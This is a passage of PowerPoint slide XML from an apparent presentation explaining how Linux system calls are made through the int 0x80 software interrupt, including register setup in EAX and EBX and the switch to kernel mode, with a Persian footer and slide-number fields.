            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>After the syscall number and the parameters have been stored in the appropriate registers, the 0x80 interrupt is executed: the CPU enters kernel mode, executes the system call and returns the control to the user process.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114"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15" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{710181D1-71E1-4191-8171-1121E161F111}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="570240"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>int 0x80</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699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>When the CPU receives a 0x80 interrupt, it enters kernel mode and executes the requested function, getting the appropriate handler through the Interrupt Descriptor Table.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>After the syscall number and the parameters have been stored in the appropriate registers, the 0x80 interrupt is executed: the CPU enters kernel mode, executes the system call and returns the control to the user process.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118"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19" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{6151F131-01A1-41B1-8161-B11181C1C181}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="570240"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>int 0x80</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699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Store the syscall number in EAX</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Store the syscall arguments in the appropriate registers or:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>    • </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>create an in-memory structure containing the </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>syscall parameters,</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>    • </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>store in EBX a pointer to the first argument</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Execute the 0x80 software interrupt.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>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Book Antiqua"/>
              </a:rPr>
              <a:t>تهران لاگ           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>92/04/04</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{E111F1E1-4161-41A1-9121-41F1B1812191}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="570240"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>To recap, to execute a system call, you need to</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